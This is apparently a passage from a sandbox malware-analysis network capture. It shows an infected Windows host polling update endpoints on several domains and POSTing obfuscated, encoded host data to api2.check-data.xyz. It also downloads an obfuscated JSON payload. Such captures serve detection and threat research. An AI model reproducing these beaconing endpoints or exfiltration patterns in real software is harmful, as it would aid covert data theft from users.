Jul 2, 2024 00:06:31.855655909 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:24 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:30:02 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 6c9a2d99a25484f38efa27d58a726b2c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: 5fRBZiewPwp5nZF5Nt2T99T67m7RUGn32FNvy0hR3STXk0yaYnVEGA== Age: 52590
Jul 2, 2024 00:06:31.992441893 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	60453	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:31.294025898 CEST	195	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www.rapidfilestorage.com
Jul 2, 2024 00:06:32.101557016 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:31 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=b3a1da8fe722984e9b21c69c37f314d6; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:56:58 GMT ETag: "6675243a-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	60454	44.240.96.128	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:31.574414968 CEST	1018	OUT	POST /api2/google_api_ifi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36 Host: api2.check-data.xyz Content-Length: 722 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 6b 3d 4d 4a 33 56 42 49 38 6f 5a 31 49 56 34 46 6b 31 73 6e 7a 36 51 44 6e 26 72 3d 4c 46 53 56 37 4d 46 53 56 33 4b 46 53 56 35 5a 45 53 56 39 48 46 53 56 37 26 67 3d 4e 44 53 56 36 5a 45 53 56 32 4b 46 53 56 33 49 46 53 56 39 4a 46 53 56 31 59 45 53 56 34 48 46 53 56 30 4e 46 53 56 30 4e 45 53 56 34 4c 46 53 56 39 4f 44 53 56 35 4c 44 53 56 33 4e 46 53 56 35 4e 45 53 56 30 4b 46 53 56 34 5a 45 53 56 31 4b 46 53 56 35 50 44 53 56 34 4e 45 53 56 37 59 45 53 56 39 4e 46 53 56 37 50 44 53 56 35 4b 46 53 56 37 4e 45 53 56 36 48 46 53 56 30 48 46 53 56 38 48 46 53 56 32 51 44 53 56 39 48 46 53 56 38 4d 44 53 56 31 4b 46 53 56 37 5a 45 53 56 31 4c 44 53 56 35 48 46 53 56 32 51 44 53 56 31 4f 44 53 56 37 26 76 3d 49 46 53 56 30 4f 45 53 56 39 47 46 53 56 32 4f 45 53 56 36 47 46 53 56 30 4f 45 53 56 35 4a 46 53 56 38 48 46 53 56 37 5a 45 53 56 39 59 45 53 56 31 26 63 3d 4e 43 53 56 36 59 43 53 56 31 5a 44 53 56 30 42 44 53 56 36 57 43 53 56 37 59 43 53 56 39 4f 43 53 56 38 57 43 53 56 33 5a 44 53 56 31 48 [TRUNCATED] Data Ascii: k=MJ3VBI8oZ1IV4Fk1snz6QDn&r=LFSV7MFSV3KFSV5ZESV9HFSV7&g=NDSV6ZESV2KFSV3IFSV9JFSV1YESV4HFSV0NFSV0NESV4LFSV9ODSV5LDSV3NFSV5NESV0KFSV4ZESV1KFSV5PDSV4NESV7YESV9NFSV7PDSV5KFSV7NESV6HFSV0HFSV8HFSV2QDSV9HFSV8MDSV1KFSV7ZESV1LDSV5HFSV2QDSV1ODSV7&v=IFSV0OESV9GFSV2OESV6GFSV0OESV5JFSV8HFSV7ZESV9YESV1&c=NCSV6YCSV1ZDSV0BDSV6WCSV7YCSV9OCSV8WCSV3ZDSV1HFSV1&u=IFSV2JFSV0HFSV4NDSV9NFSV4KFSV1ODSV8LFSV3KFSV9MDSV4ODSV3MFSV9KFSV8ODSV1LDSV7HFSV5MDSV3HFSV7NFSV8QDSV7MDSV8GFSV0QDSV9LFSV4ZESV3YESV3YESV3YESV3ODSV5JFSV7HFSV3MDSV1&rg=ZESV8MFSV0HFSV6IFSV4YESV6MDSV0KFSV3YESV1NESV3NDSV6GFSV0QDSV4GFSV6NESV6GFSV6HFSV4HFSV5LDSV2NESV2LFSV2IFSV1NFSV6IFSV3NESV6YESV4KFSV8LFSV3IFSV7IFSV0PDSV4MFSV7ZESV0KFSV2KFSV9PDSV7MDSV0&w=LFSV2IFSV1LFSV6KFSV3GFSV7JFSV9
Jul 2, 2024 00:06:32.207075119 CEST	404	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Cache-control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Date: Mon, 01 Jul 2024 22:04:42 GMT Server: nginx Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	60455	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:32.204319000 CEST	187	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: helsinki-dtc.com
Jul 2, 2024 00:06:32.910367966 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:32 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 07:08:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "667526e3-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	60456	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:33.215131998 CEST	199	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: skrptfiles.tracemonitors.com
Jul 2, 2024 00:06:33.856859922 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:24 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:29:43 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 90cf045072373c2c671297de3161846e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: y-yObOYUzsOai5-7Cr2sjFO2m137Jx9a48rniOVVVtUSJGWT0OGoUA== Age: 52611
Jul 2, 2024 00:06:33.986984968 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	60458	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:33.528419018 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 00:06:34.364617109 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:34 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=edcb28b42d85b7b34f0a25708647e4c0; Path=/; Secure; HttpOnly Last-Modified: Tue, 18 Jun 2024 14:46:24 GMT ETag: "66719dc0-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 2d 47 72 53 33 56 73 53 30 51 72 53 39 45 72 53 38 46 72 53 37 5b 72 53 39 7a 71 53 37 45 72 53 37 5c 72 53 30 56 73 53 33 4e 73 53 37 58 73 53 30 47 72 53 34 56 73 53 31 57 72 53 30 56 73 53 34 4e 73 53 33 58 73 53 37 61 71 53 31 56 73 53 35 59 71 53 31 5a 72 53 31 45 72 53 32 46 72 53 36 56 72 53 31 5b 72 53 37 43 72 53 34 5c 72 53 35 60 71 53 33 59 72 53 32 5d 72 53 32 55 72 53 34 56 73 53 38 64 73 53 30 58 73 53 32 56 73 53 33 63 71 53 38 60 71 53 37 70 71 53 34 5b 72 53 31 43 72 53 32 5c 72 53 30 5e 72 53 30 5b 72 53 38 51 72 53 37 56 72 53 31 55 72 53 34 7a 71 53 37 56 73 53 30 64 73 53 37 58 73 53 35 56 73 53 34 45 72 53 33 6a 71 53 32 51 72 53 31 7a 71 53 33 56 73 53 31 64 73 53 34 58 73 53 34 56 73 53 34 5e 73 53 36 49 72 53 36 4f 72 53 33 6b 71 53 31 45 72 53 33 46 72 53 30 5b 72 53 38 78 71 53 36 51 72 53 32 45 72 53 33 5c 72 53 32 4f 72 53 32 5a 72 53 31 65 71 53 36 56 73 53 30 64 73 53 34 58 73 53 39 56 73 53 36 44 72 53 36 43 72 53 34 56 72 53 31 7a 71 53 35 44 72 53 36 51 72 53 39 5a [TRUNCATED] Data Ascii: -GrS3VsS0QrS9ErS8FrS7[rS9zqS7ErS7\rS0VsS3NsS7XsS0GrS4VsS1WrS0VsS4NsS3XsS7aqS1VsS5YqS1ZrS1ErS2FrS6VrS1[rS7CrS4\rS5`qS3YrS2]rS2UrS4VsS8dsS0XsS2VsS3cqS8`qS7pqS4[rS1CrS2\rS0^rS0[rS8QrS7VrS1UrS4zqS7VsS0dsS7XsS5VsS4ErS3jqS2QrS1zqS3VsS1dsS4XsS4VsS4^sS6IrS6OrS3kqS1ErS3FrS0[rS8xqS6QrS2ErS3\rS2OrS2ZrS1eqS6VsS0dsS4XsS9VsS6DrS6CrS4VrS1zqS5DrS6QrS9ZrS1YrS3FrS1BrS3VsS3dsS3XsS3VsS9]qS4UrS2PrS0ZqS5ErS0^rS9UrS6zqS4VsS4dsS5XsS4VsS6uqS6\rS2UrS9FrS4QrS6PrS2PrS3UrS6zqS7VsS1dsS5XsS3VsS7yqS0]rS7VrS0TrS6zqS7WrS3VsS1dsS6XsS6VsS0wqS3YrS5OrS5zqS0[rS4yqS6[rS2TrS4FrS5XsS0^qS1YrS3yqS1ErS1QrS9^rS3XsS7YqS6FrS1ErS7VrS4YrS1[rS6VsS3gqS4dsS6XsS1VsS9DrS0VsS2NsS8XsS9aqS3VsS0^sS9YqS7ZrS0ErS2FrS9VrS7[rS1CrS1\rS2`qS3YrS7]rS0UrS3VsS3gqS1MrS1dsS6XsS5VsS8OrS2ZrS5zqS6[rS1]rS6YrS2ErS2]rS1yqS2VsS1NsS9XsS4aqS3VsS0QrS8QrS6QrS9QrS6QrS8VrS8SrS1UrS3BrS8XrS8WrS8VrS5TrS9TrS6ZrS9XrS1PrS5WrS0Tr
Jul 2, 2024 00:06:34.364645958 CEST	1236	IN	Data Raw: 53 35 58 72 53 32 53 72 53 32 5c 72 53 33 5c 72 53 39 54 72 53 32 54 72 53 30 5c 72 53 33 54 72 53 31 4f 72 53 33 54 72 53 39 54 72 53 30 50 72 53 38 53 72 53 36 56 73 53 32 64 73 53 32 58 73 53 31 56 73 53 30 51 72 53 33 51 72 53 38 51 72 53 34 Data Ascii: S5XrS2SrS2\rS3\rS9TrS2TrS0\rS3TrS1OrS3TrS9TrS0PrS8SrS6VsS2dsS2XsS1VsS0QrS3QrS8QrS4QrS0QrS8UrS4XrS8QrS3SrS6ZrS4\rS6PrS7OrS5XrS9YrS1^rS5YrS7\rS3VrS3BrS0WrS2SrS6]rS5OrS4]rS5VrS1TrS4^rS2BrS8SrS4XrS2TrS0VsS8dsS1XsS2VsS4QrS5QrS4QrS0QrS3QrS9BrS0VrS3O
Jul 2, 2024 00:06:34.364665985 CEST	1236	IN	Data Raw: 53 36 5b 72 53 30 59 72 53 39 5c 72 53 30 57 72 53 39 51 72 53 31 56 72 53 33 54 72 53 35 58 72 53 31 53 72 53 30 50 72 53 39 5b 72 53 31 58 72 53 32 5e 72 53 38 51 72 53 31 50 72 53 37 5d 72 53 35 51 72 53 36 59 72 53 30 55 72 53 34 51 72 53 38 Data Ascii: S6[rS0YrS9\rS0WrS9QrS1VrS3TrS5XrS1SrS0PrS9[rS1XrS2^rS8QrS1PrS7]rS5QrS6YrS0UrS4QrS8SrS0YrS3OrS9PrS9[rS5^rS5]rS8ZrS3VsS5dsS5XsS6VsS1QrS6YrS0YrS9]rS5VrS3WrS7VrS2\rS0SrS7TrS7OrS0YrS0BrS7XrS3[rS1ZrS5PrS2XrS0UrS4\rS4WrS8QrS3ZrS8ZrS3^rS7ZrS2OrS2OrS6B
Jul 2, 2024 00:06:34.364680052 CEST	1236	IN	Data Raw: 53 36 42 72 53 31 54 72 53 37 5c 72 53 32 5a 72 53 39 55 72 53 38 5b 72 53 30 59 72 53 31 56 73 53 35 64 73 53 38 58 73 53 38 56 73 53 38 50 72 53 32 51 72 53 30 42 72 53 39 55 72 53 34 50 72 53 38 55 72 53 31 57 72 53 34 4f 72 53 36 51 72 53 30 Data Ascii: S6BrS1TrS7\rS2ZrS9UrS8[rS0YrS1VsS5dsS8XsS8VsS8PrS2QrS0BrS9UrS4PrS8UrS1WrS4OrS6QrS0BrS9UrS5ZrS7TrS0QrS7BrS3OrS0YrS8^rS3[rS9]rS8PrS1PrS8SrS3UrS4BrS8SrS6UrS2VrS3]rS1\rS1]rS9\rS0VsS8dsS7XsS3VsS2PrS4VrS8TrS3XrS7OrS5BrS5VrS9YrS5\rS8[rS6]rS3]rS0QrS1B
Jul 2, 2024 00:06:34.364692926 CEST	1236	IN	Data Raw: 53 37 51 72 53 31 5a 72 53 32 5b 72 53 36 57 72 53 36 51 72 53 34 55 72 53 32 5e 72 53 33 5c 72 53 31 5b 72 53 36 5d 72 53 39 53 72 53 38 53 72 53 36 50 72 53 39 5b 72 53 39 5a 72 53 38 54 72 53 35 50 72 53 33 59 72 53 31 5d 72 53 30 4f 72 53 39 Data Ascii: S7QrS1ZrS2[rS6WrS6QrS4UrS2^rS3\rS1[rS6]rS9SrS8SrS6PrS9[rS9ZrS8TrS5PrS3YrS1]rS0OrS9YrS1QrS8VsS5dsS2XsS1VsS0PrS8BrS5YrS8[rS4BrS2]rS4\rS9UrS1UrS1QrS4VrS1TrS7QrS6BrS4YrS1TrS0UrS2XrS7WrS2TrS3BrS2QrS7ZrS6BrS3^rS1XrS5WrS6YrS0OrS7BrS7YrS2WrS9VsS4dsS0X
Jul 2, 2024 00:06:34.364712954 CEST	1236	IN	Data Raw: 53 38 53 72 53 30 56 73 53 32 64 73 53 37 58 73 53 30 56 73 53 30 4f 72 53 39 5a 72 53 37 57 72 53 31 5e 72 53 36 51 72 53 30 51 72 53 33 5c 72 53 35 5a 72 53 35 54 72 53 34 55 72 53 39 54 72 53 31 50 72 53 37 5c 72 53 39 42 72 53 34 5b 72 53 34 Data Ascii: S8SrS0VsS2dsS7XsS0VsS0OrS9ZrS7WrS1^rS6QrS0QrS3\rS5ZrS5TrS4UrS9TrS1PrS7\rS9BrS4[rS4YrS7ZrS8OrS5WrS5PrS5\rS7UrS5TrS9ZrS7QrS5WrS8SrS2[rS2^rS8\rS3]rS8OrS7VsS0dsS5XsS9VsS2OrS3XrS1QrS3PrS3]rS2VrS1XrS8OrS9TrS3OrS3TrS6VrS9]rS1TrS3TrS8YrS3]rS6\rS0VrS2Z
Jul 2, 2024 00:06:34.364727974 CEST	1236	IN	Data Raw: 53 33 5c 72 53 38 59 72 53 35 53 72 53 31 54 72 53 37 5a 72 53 30 51 72 53 37 5e 72 53 33 53 72 53 37 5a 72 53 31 5d 72 53 32 51 72 53 33 55 72 53 36 5d 72 53 34 54 72 53 31 54 72 53 39 5b 72 53 33 56 73 53 30 64 73 53 31 58 73 53 37 56 73 53 34 Data Ascii: S3\rS8YrS5SrS1TrS7ZrS0QrS7^rS3SrS7ZrS1]rS2QrS3UrS6]rS4TrS1TrS9[rS3VsS0dsS1XsS7VsS4VrS0QrS2QrS9\rS8SrS5^rS9BrS4OrS8BrS8WrS0XrS6XrS6^rS1WrS0ZrS3OrS0PrS2^rS1QrS1VrS2BrS4BrS6XrS2BrS2ZrS0SrS2^rS1PrS8YrS9SrS7QrS5]rS3VsS7dsS8XsS7VsS4VrS6PrS1QrS3[rS5\
Jul 2, 2024 00:06:34.364742994 CEST	1236	IN	Data Raw: 53 35 58 72 53 30 5a 72 53 32 53 72 53 39 59 72 53 34 51 72 53 32 5a 72 53 39 5b 72 53 33 5d 72 53 33 58 72 53 31 57 72 53 35 51 72 53 33 50 72 53 39 58 72 53 30 56 72 53 33 5b 72 53 32 56 72 53 31 5e 72 53 33 55 72 53 35 5d 72 53 31 5a 72 53 34 Data Ascii: S5XrS0ZrS2SrS9YrS4QrS2ZrS9[rS3]rS3XrS1WrS5QrS3PrS9XrS0VrS3[rS2VrS1^rS3UrS5]rS1ZrS4\rS2ZrS0PrS9\rS2PrS4TrS1OrS2[rS1]rS6QrS4]rS1VsS2dsS8XsS2VsS7VrS7XrS6\rS9BrS0SrS7VrS3TrS8ZrS3BrS3UrS2WrS1WrS1TrS9\rS0VrS7[rS2BrS0OrS7OrS3ZrS2VrS1BrS0BrS5UrS4ZrS6X
Jul 2, 2024 00:06:34.364759922 CEST	1236	IN	Data Raw: 53 34 55 72 53 38 4f 72 53 30 57 72 53 39 51 72 53 34 4f 72 53 34 5a 72 53 32 54 72 53 36 50 72 53 38 55 72 53 34 4f 72 53 38 56 73 53 37 64 73 53 31 58 73 53 31 56 73 53 34 55 72 53 36 51 72 53 36 5a 72 53 33 55 72 53 31 50 72 53 33 51 72 53 34 Data Ascii: S4UrS8OrS0WrS9QrS4OrS4ZrS2TrS6PrS8UrS4OrS8VsS7dsS1XsS1VsS4UrS6QrS6ZrS3UrS1PrS3QrS4]rS0YrS9[rS2BrS9VrS5ZrS2UrS7TrS5\rS5VrS5\rS1]rS1QrS5BrS3BrS5OrS0YrS4ZrS5TrS6QrS4XrS7YrS9SrS1WrS2WrS4QrS9VsS8dsS0XsS5VsS8UrS6PrS4BrS6YrS6UrS9^rS6ZrS7^rS9\rS2\rS6B
Jul 2, 2024 00:06:34.364774942 CEST	1236	IN	Data Raw: 53 30 5b 72 53 32 5c 72 53 37 5a 72 53 37 55 72 53 34 59 72 53 39 5e 72 53 34 59 72 53 31 51 72 53 30 59 72 53 37 56 72 53 35 5b 72 53 33 5d 72 53 32 54 72 53 38 54 72 53 37 42 72 53 36 42 72 53 36 5e 72 53 38 54 72 53 33 5a 72 53 39 55 72 53 38 Data Ascii: S0[rS2\rS7ZrS7UrS4YrS9^rS4YrS1QrS0YrS7VrS5[rS3]rS2TrS8TrS7BrS6BrS6^rS8TrS3ZrS9UrS8OrS0]rS0WrS7QrS4SrS1VsS1dsS2XsS9VsS7UrS4YrS2YrS7]rS2\rS5]rS7YrS9[rS3YrS6BrS2QrS4TrS4OrS3[rS6WrS7PrS7TrS7YrS6WrS7PrS8^rS7XrS4TrS2VrS0UrS7[rS5XrS1BrS8OrS2SrS1PrS8Z
Jul 2, 2024 00:06:34.369647026 CEST	1236	IN	Data Raw: 53 37 5a 72 53 38 57 72 53 30 59 72 53 37 42 72 53 37 56 73 53 39 64 73 53 33 58 73 53 39 56 73 53 32 54 72 53 35 4f 72 53 38 5c 72 53 37 5b 72 53 32 56 72 53 39 4f 72 53 34 5a 72 53 39 59 72 53 32 5a 72 53 31 42 72 53 35 50 72 53 34 4f 72 53 31 Data Ascii: S7ZrS8WrS0YrS7BrS7VsS9dsS3XsS9VsS2TrS5OrS8\rS7[rS2VrS9OrS4ZrS9YrS2ZrS1BrS5PrS4OrS1XrS3YrS5[rS2TrS4YrS0VrS1WrS7WrS0UrS8QrS9YrS4[rS0UrS1XrS0SrS5BrS7YrS0XrS5WrS4^rS0VsS0dsS7XsS0VsS7TrS3VrS8OrS3WrS2[rS4OrS1\rS4TrS6ZrS7YrS4PrS3OrS3^rS1\rS0\rS5WrS5Y

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.6	60459	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:33.657830954 CEST	382	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lVCwnpMUrdtQuoonAEIPdNPTEKYCDRfxr HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Jul 2, 2024 00:06:34.477094889 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:34 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=11248a44b4b3a3291277f6086762b568; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:29:18 GMT ETag: "66751dbe-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	60460	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:34.702677965 CEST	374	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?uKnuZolhihzrwcGciuiXPYJRFqygVFjtF HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Jul 2, 2024 00:06:35.414705992 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:34 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 06:57:05 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66752441-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	60462	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:35.471818924 CEST	386	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?UpPMoHiZGixvnmLTDXgCACmDdHoeBzWlB HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
Jul 2, 2024 00:06:36.142990112 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:23 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:29:11 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 90cf045072373c2c671297de3161846e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: AbDpB7nU2NLoPmftL2PdTGhqeu_iOjUSo6ACDiS9YLbelqBAo9F6wA== Age: 52646
Jul 2, 2024 00:06:36.280442953 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	60464	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:36.084805012 CEST	197	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www.rapidfilestorage.com
Jul 2, 2024 00:06:36.897403002 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:36 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=13db8a2aaddbafa89a4e74ec4a29bdac; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:29:18 GMT ETag: "66751dbe-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.6	60465	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:37.349895000 CEST	189	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: helsinki-dtc.com
Jul 2, 2024 00:06:38.075997114 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:37 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 06:57:05 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66752441-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187
Jul 2, 2024 00:06:38.286381006 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:37 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 06:57:05 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66752441-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	60466	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:38.753106117 CEST	201	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: skrptfiles.tracemonitors.com
Jul 2, 2024 00:06:39.434257984 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:23 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:29:43 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 0d94766f433ae64cf30c40acb74fc43e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: wFZ-pcpFOfrw9djU8umlP-rufA8c8dGdd1TWY-wBDuIp5HYnwtqqvA== Age: 52617
Jul 2, 2024 00:06:39.571156025 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	60467	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:38.879051924 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 00:06:39.713871002 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:39 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=3c8f624f98243f5351dd336e2290e2c3; Path=/; Secure; HttpOnly Last-Modified: Tue, 18 Jun 2024 14:46:24 GMT ETag: "66719dc0-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 2d 47 72 53 33 56 73 53 30 51 72 53 39 45 72 53 38 46 72 53 37 5b 72 53 39 7a 71 53 37 45 72 53 37 5c 72 53 30 56 73 53 33 4e 73 53 37 58 73 53 30 47 72 53 34 56 73 53 31 57 72 53 30 56 73 53 34 4e 73 53 33 58 73 53 37 61 71 53 31 56 73 53 35 59 71 53 31 5a 72 53 31 45 72 53 32 46 72 53 36 56 72 53 31 5b 72 53 37 43 72 53 34 5c 72 53 35 60 71 53 33 59 72 53 32 5d 72 53 32 55 72 53 34 56 73 53 38 64 73 53 30 